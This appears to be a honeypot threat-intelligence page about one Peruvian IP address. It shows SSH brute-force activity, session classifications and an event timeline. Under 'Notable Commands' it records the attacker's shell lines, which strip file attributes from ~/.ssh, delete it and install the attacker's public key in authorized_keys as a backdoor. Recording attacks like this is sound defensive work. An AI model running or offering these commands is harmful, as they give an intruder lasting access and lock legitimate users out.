← Back to feed

161.132.39.242

Threat Confidence
48%
Location
🇵🇪 PE
ASN
AS3132 · Red Cientifica Peruana
Cloud Provider
Total Events
341
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-08 04:10 — 2026-04-08 04:53
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Initial Access
Defense Evasion
Credential Access
Command and Control
External Corroboration
Not flagged by any external feeds
Campaigns
Not associated with any campaigns
Session Forensics
malware_dropper ×12 credential_harvester ×25 opportunistic_bruter ×12
Sessions
49 (24 with login)
Avg Depth Score
0.55
Commands Executed
36
Files Downloaded
12
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Fingerprints
03a80b21afa810682a776a7d42e5e6fb
SSH-2.0-libssh_0.11.1
Evidence Timeline
Credential Harvester a22f0e5bd855 w4m_singapore_01 · 2026-04-08 04:53
1 35%
Loading events...
Credential Harvester 3655b717ab03 w4m_singapore_01 · 2026-04-08 04:52
1 35%
Loading events...
Malware Dropper 7826b5182cbe w4m_singapore_01 · 2026-04-08 04:50
3 1 1 100%
Loading events...
Opportunistic Bruter 8f7498075061 w4m_singapore_01 · 2026-04-08 04:50
1 50%
Loading events...
Credential Harvester fc06ac243120 w4m_singapore_01 · 2026-04-08 04:50
1 35%
Loading events...
Credential Harvester ea78952a0040 w4m_singapore_01 · 2026-04-08 04:48
1 35%
Loading events...
Credential Harvester 94b5890aa9be w4m_singapore_01 · 2026-04-08 04:46
1 35%
Loading events...
Credential Harvester 158de14b4d43 w4m_singapore_01 · 2026-04-08 04:45
1 35%
Loading events...
Malware Dropper 87e650463841 w4m_singapore_01 · 2026-04-08 04:43
3 1 1 100%
Loading events...
Opportunistic Bruter 060f899d76a1 w4m_singapore_01 · 2026-04-08 04:43
1 50%
Loading events...
Credential Harvester 5a388f8476e3 w4m_singapore_01 · 2026-04-08 04:43
1 35%
Loading events...
Malware Dropper 06f38c922df8 w4m_singapore_01 · 2026-04-08 04:41
3 1 1 100%
Loading events...
Opportunistic Bruter b2e0c8fe027d w4m_singapore_01 · 2026-04-08 04:41
1 50%
Loading events...
Credential Harvester bd06d64b2680 w4m_singapore_01 · 2026-04-08 04:41
1 35%
Loading events...
Credential Harvester 3f6db2d18b2f w4m_singapore_01 · 2026-04-08 04:39
1 35%
Loading events...
Malware Dropper 61beccc06153 w4m_singapore_01 · 2026-04-08 04:37
3 1 1 100%
Loading events...
Opportunistic Bruter b3088b52ad94 w4m_singapore_01 · 2026-04-08 04:38
1 50%
Loading events...
Credential Harvester 30321503d0c0 w4m_singapore_01 · 2026-04-08 04:38
1 35%
Loading events...
Credential Harvester aa73c7be0c47 w4m_singapore_01 · 2026-04-08 04:36
1 35%
Loading events...
Malware Dropper 6af29a0df2ad w4m_singapore_01 · 2026-04-08 04:34
3 1 1 100%
Loading events...
Opportunistic Bruter e648d78a59ba w4m_singapore_01 · 2026-04-08 04:34
1 50%
Loading events...
Credential Harvester c1ce7122ba76 w4m_singapore_01 · 2026-04-08 04:34
1 35%
Loading events...
Credential Harvester c38e39024390 w4m_singapore_01 · 2026-04-08 04:32
1 35%
Loading events...
Opportunistic Bruter 97298c6e477e w4m_singapore_01 · 2026-04-08 04:31
1 50%
Loading events...
Malware Dropper 397f2643697e w4m_singapore_01 · 2026-04-08 04:31
3 1 1 100%
Loading events...
Credential Harvester 9a168e42590b w4m_singapore_01 · 2026-04-08 04:31
1 35%
Loading events...
Opportunistic Bruter c968bbdb8afe w4m_singapore_01 · 2026-04-08 04:29
1 50%
Loading events...
Malware Dropper e134fe1274e8 w4m_singapore_01 · 2026-04-08 04:29
3 1 1 100%
Loading events...
Credential Harvester a77cfd1c6165 w4m_singapore_01 · 2026-04-08 04:29
1 35%
Loading events...
Opportunistic Bruter 0f2f3258b672 w4m_singapore_01 · 2026-04-08 04:27
1 50%
Loading events...
Malware Dropper 184c5fa7e181 w4m_singapore_01 · 2026-04-08 04:27
3 1 1 100%
Loading events...
Credential Harvester 12583e13c4be w4m_singapore_01 · 2026-04-08 04:27
1 35%
Loading events...
Credential Harvester a7dbec4ea657 w4m_singapore_01 · 2026-04-08 04:25
1 35%
Loading events...
Credential Harvester d8831e8d54bc w4m_singapore_01 · 2026-04-08 04:23
1 35%
Loading events...
Opportunistic Bruter b4b734e4bbbe w4m_singapore_01 · 2026-04-08 04:22
1 50%
Loading events...
Malware Dropper 7e06ea4428ef w4m_singapore_01 · 2026-04-08 04:22
3 1 1 100%
Loading events...
Credential Harvester a2e95a263b66 w4m_singapore_01 · 2026-04-08 04:22
1 35%
Loading events...
Credential Harvester 05a08770cf1e w4m_singapore_01 · 2026-04-08 04:20
1 35%
Loading events...
Opportunistic Bruter 9456002687e4 w4m_singapore_01 · 2026-04-08 04:18
1 50%
Loading events...
Malware Dropper 109b4ce8477c w4m_singapore_01 · 2026-04-08 04:18
3 1 1 100%
Loading events...
Credential Harvester 1e219f84b880 w4m_singapore_01 · 2026-04-08 04:18
1 35%
Loading events...
Opportunistic Bruter 7eb50ae03a48 w4m_singapore_01 · 2026-04-08 04:17
1 50%
Loading events...
Malware Dropper 13d79da02c7c w4m_singapore_01 · 2026-04-08 04:17
3 1 1 100%
Loading events...
Credential Harvester 195603c0dfc6 w4m_singapore_01 · 2026-04-08 04:17
1 35%
Loading events...
Malware Dropper 9503f1eefcd2 w4m_singapore_01 · 2026-04-08 04:15
3 1 1 100%
Loading events...
Opportunistic Bruter a1bcbbf27b84 w4m_singapore_01 · 2026-04-08 04:15
1 50%
Loading events...
Credential Harvester 63e08f1961b3 w4m_singapore_01 · 2026-04-08 04:15
1 35%
Loading events...
Credential Harvester 0f738bcf2cfd w4m_singapore_01 · 2026-04-08 04:13
1 35%
Loading events...
Credential Harvester eea1c383f4de w4m_singapore_01 · 2026-04-08 04:10
1 35%
Loading events...